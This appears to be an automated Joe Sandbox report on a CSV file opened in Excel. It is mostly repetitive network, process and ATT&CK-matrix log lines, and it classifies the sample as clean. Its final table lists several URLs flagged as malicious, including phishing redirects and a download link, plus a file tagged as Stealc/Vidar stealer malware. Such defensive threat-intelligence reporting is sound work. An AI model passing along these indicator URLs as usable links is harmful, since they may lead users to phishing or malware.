Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: classification engineClassification label: clean3.winCSV@3/2@0/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\msoADF9.tmpJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{1C8AD627-A019-441B-B063-0551DCEA05FF} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: PII_PCI_Policy_15205.csvStatic file information: File size 2337502 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 854Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
s-part-0017.t-0009.t-msedge.net0%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0017.t-0009.t-msedge.net
13.107.246.45
truefalseunknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
13.107.246.45
s-part-0017.t-0009.t-msedge.netUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1545068
Start date and time:2024-10-30 03:44:41 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 22s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:PII_PCI_Policy_15205.csv
Detection:CLEAN
Classification:clean3.winCSV@3/2@0/1
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .csv
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.28.47, 184.28.90.27, 52.113.194.132, 93.184.221.240, 52.168.117.171
  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedscolprdeus16.eastus.cloudapp.azure.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, uks-azsc-00
  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
TimeTypeDescription
22:46:40API Interceptor879x Sleep call for process: splwow64.exe modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
  • nam.dcv.ms/BxPVLH2cz4
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
s-part-0017.t-0009.t-msedge.nethttps://alcatrazpackages.com/elchapo.htmlGet hashmaliciousUnknownBrowse
  • 13.107.246.45
https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
  • 13.107.246.45
https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
  • 13.107.246.45
file.exeGet hashmaliciousStealc, VidarBrowse
  • 13.107.246.45
https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
  • 13.107.246.45
